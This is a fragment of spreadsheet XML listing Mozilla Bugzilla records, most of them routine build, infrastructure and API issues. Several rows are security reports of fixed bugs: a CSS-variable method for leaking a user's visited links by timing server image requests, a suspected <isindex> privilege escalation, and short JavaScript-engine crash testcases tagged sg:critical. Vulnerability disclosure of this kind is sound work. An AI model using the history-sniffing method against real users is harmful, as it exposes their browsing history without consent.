          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5484" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5484" t="inlineStr"/>
      <c r="Q5484" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5484" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5484" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5484" t="n">
        <v>1</v>
      </c>
      <c r="U5484" t="n">
        <v>0</v>
      </c>
      <c r="V5484" t="n">
        <v>2</v>
      </c>
      <c r="W5484" t="inlineStr">
        <is>
          <t>This is a tracking bug for Build and Release of SeaMonkey 2.13 Beta 6
We expect an actual release on Friday 5th October.</t>
        </is>
      </c>
      <c r="X5484" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5485">
      <c r="A5485" t="n">
        <v>1760674</v>
      </c>
      <c r="B5485" t="inlineStr">
        <is>
          <t>2022-03-21 12:44:56 -0700</t>
        </is>
      </c>
      <c r="C5485" t="inlineStr">
        <is>
          <t>Utilizing CSS variables caused a browser behavior that leaks the information on visited links</t>
        </is>
      </c>
      <c r="D5485" t="inlineStr">
        <is>
          <t>2024-05-30 10:54:55 -0700</t>
        </is>
      </c>
      <c r="E5485" t="n">
        <v>1</v>
      </c>
      <c r="F5485" t="n">
        <v>1</v>
      </c>
      <c r="G5485" t="n">
        <v>3</v>
      </c>
      <c r="H5485" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5485" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5485" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K5485" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5485" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5485" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5485" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5485" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5485" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][sec-survey][adv-main100+][adv-esr91.9+]</t>
        </is>
      </c>
      <c r="Q5485" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5485" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5485" t="inlineStr">
        <is>
          <t>100 Branch</t>
        </is>
      </c>
      <c r="T5485" t="n">
        <v>1</v>
      </c>
      <c r="U5485" t="n">
        <v>0</v>
      </c>
      <c r="V5485" t="n">
        <v>29</v>
      </c>
      <c r="W5485" t="inlineStr">
        <is>
          <t>Created attachment 9268750
files.zip
The video shows it the best: https://drive.google.com/file/d/1StFD0aHblp5iREsysaWbnytvCyj0DnX1/view
If you create multiple links like this:
&lt;a href="https://facebook.com" id="facebook"&gt;facebook&lt;/a&gt; &lt;br&gt;
with the style like this:
#facebook
{
 --visited-facebook: url('facebook-visited.gif');
 background-image: var(--visited-facebook);
}
Using the CSS variables will cause the browser to request the background image twice. 
If there are multiple links like this, each one with a certain background image - the browser will do one full run of requesting the images, then it will start the second full run of requesting images.
But the behavior completely changes when the same website is refreshed. Somehow caching influences the order of requesting background images. 
After refreshing - the browser still performs two runs of requesting images. The first one consists of all images in the right order. But the second run is one of two:
a) unvisited links, and then - at the end - the visited links 
or
b) only visited links - but still - at the end. 
So no matter what - the background images of visited links get requested right at the end. 
So I added additional links at the beginning and at the end to play a role of markers. Their background images contain a "MARKER" keyword. 
I opened the list of links in the iframe, and added javascript that reloads this inframe after a second to simulate a refresh. 
This way a server creates logs for all requested images. 
I created the script that finds the last entry of the MARKER image in the logs. This way we know that each log entry that happens after that is the entry created by visited links. 
Script "get_history.sh" shows which images got requested after the MARKER ( meaning that they come from visited links).</t>
        </is>
      </c>
      <c r="X5485" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5486">
      <c r="A5486" t="n">
        <v>895995</v>
      </c>
      <c r="B5486" t="inlineStr">
        <is>
          <t>2013-07-19 11:34:35 -0700</t>
        </is>
      </c>
      <c r="C5486" t="inlineStr">
        <is>
          <t>py27_mercurial DMG installs to a different location than RPM</t>
        </is>
      </c>
      <c r="D5486" t="inlineStr">
        <is>
          <t>2015-02-27 08:27:54 -0800</t>
        </is>
      </c>
      <c r="E5486" t="n">
        <v>1</v>
      </c>
      <c r="F5486" t="n">
        <v>1</v>
      </c>
      <c r="G5486" t="n">
        <v>5</v>
      </c>
      <c r="H5486" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5486" t="inlineStr">
        <is>
          <t>Infrastructure &amp; Operations</t>
        </is>
      </c>
      <c r="J5486" t="inlineStr">
        <is>
          <t>RelOps: Puppet</t>
        </is>
      </c>
      <c r="K5486" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5486" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5486" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5486" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5486" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5486" t="inlineStr">
        <is>
          <t>[kanban:engops:https://mozilla.kanbanize.com/ctrl_board/6/747] [time=0:30]</t>
        </is>
      </c>
      <c r="Q5486" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5486" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5486" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5486" t="n">
        <v>1</v>
      </c>
      <c r="U5486" t="n">
        <v>0</v>
      </c>
      <c r="V5486" t="n">
        <v>33</v>
      </c>
      <c r="W5486" t="inlineStr">
        <is>
          <t>This is kind of a mess.
On Darwin, it installs to /tools/mercurial, with a link from /usr/local/bin
On CentOS, it installs to /tools/python27_mercurial, with a link from /usr/local/bin
On Ubuntu, /tools/python27_mercurial contains a symlink *to* /usr/bin/hg
Will changing the location on Darwin break anything?</t>
        </is>
      </c>
      <c r="X5486" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5487">
      <c r="A5487" t="n">
        <v>1376030</v>
      </c>
      <c r="B5487" t="inlineStr">
        <is>
          <t>2017-06-23 15:39:26 -0700</t>
        </is>
      </c>
      <c r="C5487" t="inlineStr">
        <is>
          <t>Android Addons broken</t>
        </is>
      </c>
      <c r="D5487" t="inlineStr">
        <is>
          <t>2022-07-26 12:19:01 -0700</t>
        </is>
      </c>
      <c r="E5487" t="n">
        <v>1</v>
      </c>
      <c r="F5487" t="n">
        <v>1</v>
      </c>
      <c r="G5487" t="n">
        <v>2</v>
      </c>
      <c r="H5487" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5487" t="inlineStr">
        <is>
          <t>Data Platform and Tools</t>
        </is>
      </c>
      <c r="J5487" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5487" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5487" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5487" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5487" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5487" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5487" t="inlineStr"/>
      <c r="Q5487" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5487" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5487" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5487" t="n">
        <v>1</v>
      </c>
      <c r="U5487" t="n">
        <v>0</v>
      </c>
      <c r="V5487" t="n">
        <v>1</v>
      </c>
      <c r="W5487" t="inlineStr">
        <is>
          <t>To work around, we can map `deepcopy` on the pings.</t>
        </is>
      </c>
      <c r="X5487" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5488">
      <c r="A5488" t="n">
        <v>90235</v>
      </c>
      <c r="B5488" t="inlineStr">
        <is>
          <t>2001-07-10 16:15:19 -0700</t>
        </is>
      </c>
      <c r="C5488" t="inlineStr">
        <is>
          <t>M092 crash [@ nsXBLService::LoadBindings ]</t>
        </is>
      </c>
      <c r="D5488" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E5488" t="n">
        <v>1</v>
      </c>
      <c r="F5488" t="n">
        <v>1</v>
      </c>
      <c r="G5488" t="n">
        <v>2</v>
      </c>
      <c r="H5488" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5488" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J5488" t="inlineStr">
        <is>
          <t>Bookmarks &amp; History</t>
        </is>
      </c>
      <c r="K5488" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5488" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5488" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5488" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5488" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5488" t="inlineStr"/>
      <c r="Q5488" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5488" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5488" t="inlineStr">
        <is>
          <t>mozilla1.0</t>
        </is>
      </c>
      <c r="T5488" t="n">
        <v>1</v>
      </c>
      <c r="U5488" t="n">
        <v>0</v>
      </c>
      <c r="V5488" t="n">
        <v>11</v>
      </c>
      <c r="W5488" t="inlineStr">
        <is>
          <t>This stack is showing up again in M092 with comments similar to those in bug 
67427 with the same signature. Opening a new bug for M092.
Talkback report info: 
         nsXBLService::LoadBindings
[d:\builds\seamonkey\mozilla\content\xbl\src\nsXBLService.cpp  line 640]
         nsCSSFrameConstructor::ConstructFrameInternal
[d:\builds\seamonkey\mozilla\layout\html\style\src\nsCSSFrameConstructor.cpp  
line 7173]
         nsCSSFrameConstructor::CreateTreeWidgetContent
[d:\builds\seamonkey\mozilla\layout\html\style\src\nsCSSFrameConstructor.cpp  
line 12442]
         nsXULTreeGroupFrame::GetFirstTreeBox
[d:\builds\seamonkey\mozilla\layout\xul\base\src\nsXULTreeGroupFrame.cpp  line 
304]
         nsTreeLayout::LazyRowCreator
[d:\builds\seamonkey\mozilla\layout\xul\base\src\nsTreeLayout.cpp  line 343]
         nsXULTreeOuterGroupFrame::ReflowFinished
[d:\builds\seamonkey\mozilla\layout\xul\base\src\nsXULTreeOuterGroupFrame.cpp  
line 1323]
         PresShell::HandlePostedReflowCallbacks
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsPresShell.cpp  line 4705]
         PresShell::ProcessReflowCommands
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsPresShell.cpp  line 5894]
         PresShell::FlushPendingNotifications
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsPresShell.cpp  line 4796]
         nsXULTreeOuterGroupFrame::InternalPositionChanged
[d:\builds\seamonkey\mozilla\layout\xul\base\src\nsXULTreeOuterGroupFrame.cpp  
line 781]
         nsXULTreeOuterGroupFrame::InternalPositionChangedCallback
[d:\builds\seamonkey\mozilla\layout\xul\base\src\nsXULTreeOuterGroupFrame.cpp  
line 695]
         nsScrollSmoother::Notify
[d:\builds\seamonkey\mozilla\layout\xul\base\src\nsXULTreeOuterGroupFrame.cpp  
line 210]
         nsTimerManager::FireNextReadyTimer
[d:\builds\seamonkey\mozilla\widget\timer\src\windows\nsTimerManager.cpp  line 
117]
         nsAppShellService::Run
[d:\builds\seamonkey\mozilla\xpfe\appshell\src\nsAppShellService.cpp  line 419]
         PR_AtomicDecrement     [../../../../pr/src/misc/pratom.c  line 292]
         nsMemoryImpl::Release  
[d:\builds\seamonkey\mozilla\xpcom\base\nsMemoryImpl.cpp  line 201]
         nsCOMPtr_base::~nsCOMPtr_base  
[d:\builds\seamonkey\mozilla\xpcom\base\nsCOMPtr.cpp  line
50]
         NS_InitXPCOM2  [d:\builds\seamonkey\mozilla\xpcom\build\nsXPComInit.cpp  
line 415]
         nsAppShellService::Run
[d:\builds\seamonkey\mozilla\xpfe\appshell\src\nsAppShellService.cpp  line 419]
         main1  [d:\builds\seamonkey\mozilla\xpfe\bootstrap\nsAppRunner.cpp  
line 1168]
         main   [d:\builds\seamonkey\mozilla\xpfe\bootstrap\nsAppRunner.cpp  
line 1467]
         WinMain        
[d:\builds\seamonkey\mozilla\xpfe\bootstrap\nsAppRunner.cpp  line 1485]
         WinMainCRTStartup()
         KERNEL32.DLL + 0x1b560 (0xbff8b560)
         KERNEL32.DLL + 0x1b412 (0xbff8b412)
         KERNEL32.DLL + 0x19dd5 (0xbff89dd5)
(32616641)  Comments: opening and closing folders while browsing the filesystem 
tree!!It keeps crashing! it is very repeatable: just click on
an arrowto close a folder and then double click on a folder
     (32504498) Comments: Browsing bookmarks menu
     (32501876) URL: www.alsa-project.org
     (32501876) Comments: waiting for page to load
     (32449406) Comments: paging through a search
     (32411481) URL: www.google.com
     (32411481) Comments: searching</t>
        </is>
      </c>
      <c r="X5488" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5489">
      <c r="A5489" t="n">
        <v>482463</v>
      </c>
      <c r="B5489" t="inlineStr">
        <is>
          <t>2009-03-10 07:01:49 -0700</t>
        </is>
      </c>
      <c r="C5489" t="inlineStr">
        <is>
          <t>Consistent timeout failures on unit tests early in the mornings</t>
        </is>
      </c>
      <c r="D5489" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5489" t="n">
        <v>1</v>
      </c>
      <c r="F5489" t="n">
        <v>1</v>
      </c>
      <c r="G5489" t="n">
        <v>5</v>
      </c>
      <c r="H5489" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5489" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5489" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5489" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5489" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5489" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5489" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5489" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5489" t="inlineStr"/>
      <c r="Q5489" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5489" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5489" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5489" t="n">
        <v>1</v>
      </c>
      <c r="U5489" t="n">
        <v>0</v>
      </c>
      <c r="V5489" t="n">
        <v>23</v>
      </c>
      <c r="W5489" t="inlineStr">
        <is>
          <t>I usually look at tinderbox at about 5-6am Pacific for the first time in the morning, and every day the last several cycles of unit tests are orange with various timeout-related oranges.  A sampling from today (ignoring the orange caused by actual code changes):
buildbot.slave.commands.TimeoutError: command timed out: 300 seconds without output, killing pid 27909
buildbot.slave.commands.TimeoutError: command timed out: 300 seconds without output, killing pid 30167
buildbot.slave.commands.TimeoutError: command timed out: 300 seconds without output
(That's all three of the unit test cycles that tested rev 1d032a7fd91a on m-c).
buildbot.slave.commands.TimeoutError: command timed out: 300 seconds without output, killing pid 15844
buildbot.slave.commands.TimeoutError: command timed out: 300 seconds without output, killing pid 50401
(two of three unit test cycles testing rev 3b40510faeff on m-c)
*** 42317 ERROR TEST-UNEXPECTED-FAIL | /tests/intl/uconv/tests/test_unicode_noncharacters_gb18030.html | Error thrown during test: $("display") is null - got 0, expected 1
*** 42320 ERROR TEST-UNEXPECTED-FAIL | /tests/intl/uconv/tests/test_unicode_noncharacters_utf8.html | Error thrown during test: $("display") is null - got 0, expected 1
(this is due to it taking the test machine more than 100ms to parse a &lt;/pre&gt;, an &lt;a&gt; with a bit of text in it, and a &lt;p&gt; with that ID).
Is there something going on that makes load go through the roof on the unit test machines sometime between 23:00 and 04:00 pacific?  It'd be really nice to fix it, whatever it is...</t>
        </is>
      </c>
      <c r="X5489" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5490">
      <c r="A5490" t="n">
        <v>609437</v>
      </c>
      <c r="B5490" t="inlineStr">
        <is>
          <t>2010-11-03 16:37:36 -0700</t>
        </is>
      </c>
      <c r="C5490" t="inlineStr">
        <is>
          <t>&lt;isindex&gt; doesn't CheckLoadURI</t>
        </is>
      </c>
      <c r="D5490" t="inlineStr">
        <is>
          <t>2024-05-29 15:46:42 -0700</t>
        </is>
      </c>
      <c r="E5490" t="n">
        <v>1</v>
      </c>
      <c r="F5490" t="n">
        <v>1</v>
      </c>
      <c r="G5490" t="n">
        <v>3</v>
      </c>
      <c r="H5490" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5490" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5490" t="inlineStr">
        <is>
          <t>Layout: Form Controls</t>
        </is>
      </c>
      <c r="K5490" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5490" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5490" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5490" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5490" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5490" t="inlineStr">
        <is>
          <t>[sg:critical (stepping stone)]</t>
        </is>
      </c>
      <c r="Q5490" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5490" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5490" t="inlineStr">
        <is>
          <t>mozilla2.0b8</t>
        </is>
      </c>
      <c r="T5490" t="n">
        <v>1</v>
      </c>
      <c r="U5490" t="n">
        <v>0</v>
      </c>
      <c r="V5490" t="n">
        <v>15</v>
      </c>
      <c r="W5490" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11
potential privilege escalation via elements without window 
Reproducible: Always
Steps to Reproduce:
1. open the redpil.html
2.
3.
Actual Results:  
Redirection to chrome://browser/content/broser.xul?
Expected Results:  
incrase privileges 
(but I do not know when it happens)
redpil.html</t>
        </is>
      </c>
      <c r="X5490" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5491">
      <c r="A5491" t="n">
        <v>720380</v>
      </c>
      <c r="B5491" t="inlineStr">
        <is>
          <t>2012-01-23 08:26:37 -0800</t>
        </is>
      </c>
      <c r="C5491" t="inlineStr">
        <is>
          <t>Assertion failure: lastProperty()-&gt;hasSlot() &amp;&amp; getSlot(lastProperty()-&gt;slot()).isUndefined(), at jsscope.cpp:1056</t>
        </is>
      </c>
      <c r="D5491" t="inlineStr">
        <is>
          <t>2013-01-19 14:33:33 -0800</t>
        </is>
      </c>
      <c r="E5491" t="n">
        <v>1</v>
      </c>
      <c r="F5491" t="n">
        <v>1</v>
      </c>
      <c r="G5491" t="n">
        <v>3</v>
      </c>
      <c r="H5491" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5491" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5491" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5491" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5491" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5491" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5491" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5491" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5491" t="inlineStr">
        <is>
          <t>[sg:critical][qa!] js-triage-done</t>
        </is>
      </c>
      <c r="Q5491" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5491" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5491" t="inlineStr">
        <is>
          <t>mozilla13</t>
        </is>
      </c>
      <c r="T5491" t="n">
        <v>1</v>
      </c>
      <c r="U5491" t="n">
        <v>0</v>
      </c>
      <c r="V5491" t="n">
        <v>15</v>
      </c>
      <c r="W5491" t="inlineStr">
        <is>
          <t>The following test asserts on mozilla-central revision 42368fe44c8c (options -m -n):
function MyObject( value ) {
  this.toBoolean = (this[ this.Function = this ]++ );
}
new MyObject(true);</t>
        </is>
      </c>
      <c r="X5491" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5492">
      <c r="A5492" t="n">
        <v>583937</v>
      </c>
      <c r="B5492" t="inlineStr">
        <is>
          <t>2010-08-02 18:00:50 -0700</t>
        </is>
      </c>
      <c r="C5492" t="inlineStr">
        <is>
          <t>tr_xmlrpc.cgi: 404 Not Found in Testopia 2.4</t>
        </is>
      </c>
      <c r="D5492" t="inlineStr">
        <is>
          <t>2010-08-03 10:39:04 -0700</t>
        </is>
      </c>
      <c r="E5492" t="n">
        <v>1</v>
      </c>
      <c r="F5492" t="n">
        <v>1</v>
      </c>
      <c r="G5492" t="n">
        <v>4</v>
      </c>
      <c r="H5492" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5492" t="inlineStr">
        <is>
          <t>Testopia</t>
        </is>
      </c>
      <c r="J5492" t="inlineStr">
        <is>
          <t>API</t>
        </is>
      </c>
      <c r="K5492" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5492" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5492" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5492" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5492" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5492" t="inlineStr"/>
      <c r="Q5492" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5492" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5492" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5492" t="n">
        <v>0</v>
      </c>
      <c r="U5492" t="n">
        <v>0</v>
      </c>
      <c r="V5492" t="n">
        <v>5</v>
      </c>
      <c r="W5492" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 (.NET CLR 3.5.30729)
Build Identifier: 
We were using the python driver: http://landfill.bugzilla.org/testopia2/testopia/contrib/drivers/python/testopia.py
Which worked fine until Testopia 2.4 came out. I tried changing the URL to http://&lt;testopia&gt;/xmlrpc.cgi and got:
&lt;Fault Client: 'Failed to locate method (lookup_login_by_id) in class (Bugzilla::WebService::User) at /usr/local/share/perl/5.10.0/SOAP/Lite.pm line 2765.\n'&gt;
What's the new URL and what has to be changed in that XMLRPC driver?
Reproducible: Always</t>
        </is>
      </c>
      <c r="X5492" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5493">
      <c r="A5493" t="n">
        <v>530751</v>
      </c>
      <c r="B5493" t="inlineStr">
        <is>
          <t>2009-11-24 02:41:54 -0800</t>
        </is>
      </c>
      <c r="C5493" t="inlineStr">
        <is>
          <t>http://download.mozilla.org/rss/download-counts.php is broken</t>
        </is>
      </c>
      <c r="D5493" t="inlineStr">
        <is>
          <t>2009-11-25 12:14:14 -0800</t>
        </is>
      </c>
      <c r="E5493" t="n">
        <v>1</v>
      </c>
      <c r="F5493" t="n">
        <v>1</v>
      </c>
      <c r="G5493" t="n">
        <v>4</v>
      </c>
      <c r="H5493" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5493" t="inlineStr">
        <is>
          <t>Webtools</t>
        </is>
      </c>
      <c r="J5493" t="inlineStr">
        <is>
          <t>Bouncer</t>
        </is>
      </c>
      <c r="K5493" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L5493" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5493" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5493" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5493" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5493" t="inlineStr"/>
      <c r="Q5493" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5493" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5493" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="T5493" t="n">
        <v>1</v>
      </c>
      <c r="U5493" t="n">
        <v>0</v>
      </c>
      <c r="V5493" t="n">
        <v>11</v>
      </c>
      <c r="W5493" t="inlineStr">
        <is>
          <t>As per bug 464778 comment 23, bouncer logging on has been disabled since November 4th (20 days ago). Can this please be re-enabled?</t>
        </is>
      </c>
      <c r="X5493" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5494">
      <c r="A5494" t="n">
        <v>558541</v>
      </c>
      <c r="B5494" t="inlineStr">
        <is>
          <t>2010-04-10 05:17:31 -0700</t>
        </is>
      </c>
      <c r="C5494" t="inlineStr">
        <is>
          <t>js_SetPropertyHelper doesn't notify tracer when setting a non-writable property with strict option on or "Assertion failure: s0-&gt;isQuad(), at ../jstracer.cpp" or "Assertion failure: v_ins-&gt;isF64(), at ../jstracer.cpp"</t>
        </is>
      </c>
      <c r="D5494" t="inlineStr">
        <is>
          <t>2011-03-29 19:31:17 -0700</t>
        </is>
      </c>
      <c r="E5494" t="n">
        <v>1</v>
      </c>
      <c r="F5494" t="n">
        <v>1</v>
      </c>
      <c r="G5494" t="n">
        <v>3</v>
      </c>
      <c r="H5494" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5494" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5494" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5494" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5494" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5494" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5494" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5494" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5494" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q5494" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5494" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5494" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5494" t="n">
        <v>1</v>
      </c>
      <c r="U5494" t="n">
        <v>0</v>
      </c>
      <c r="V5494" t="n">
        <v>15</v>
      </c>
      <c r="W5494" t="inlineStr">
        <is>
          <t>Shell testcase, crashes with gnarly low-level assertion:
options("strict");
for (var i = 0; i &lt; 5; i++)
  Boolean.prototype = 42;
Unlike bug 558249 (fallout from bug 550402), this goes back a ways -- I can reproduce the problem with a 3.6 tree.  Strangely, I have trouble causing a failure inside the browser with javascript.options.strict set to true; not sure what's up there, but the shell behavior is more than enough to make me worry about the browser as well.
I noticed this while working on the fix for bug 558249, but since it's applicable a ways back it seems better to separate it out into this bug -- let that one take care of the shorter-term regression.</t>
        </is>
      </c>
      <c r="X5494" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5495">
      <c r="A5495" t="n">
        <v>328108</v>
      </c>
      <c r="B5495" t="inlineStr">
        <is>
          <t>2006-02-21 14:09:54 -0800</t>
        </is>
      </c>
      <c r="C5495" t="inlineStr">
        <is>
          <t>Unable to login on a fresh Bugzilla install using the login form on the home page</t>
        </is>
      </c>
      <c r="D5495" t="inlineStr">
        <is>
          <t>2007-02-13 21:48:16 -0800</t>
        </is>
      </c>
      <c r="E5495" t="n">
        <v>1</v>
      </c>
      <c r="F5495" t="n">
        <v>1</v>
      </c>
      <c r="G5495" t="n">
        <v>4</v>
      </c>
      <c r="H5495" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5495" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5495" t="inlineStr">
        <is>
          <t>Installation &amp; Upgrading</t>
        </is>
      </c>
      <c r="K5495" t="inlineStr">
        <is>
          <t>2.20.1</t>
        </is>
      </c>
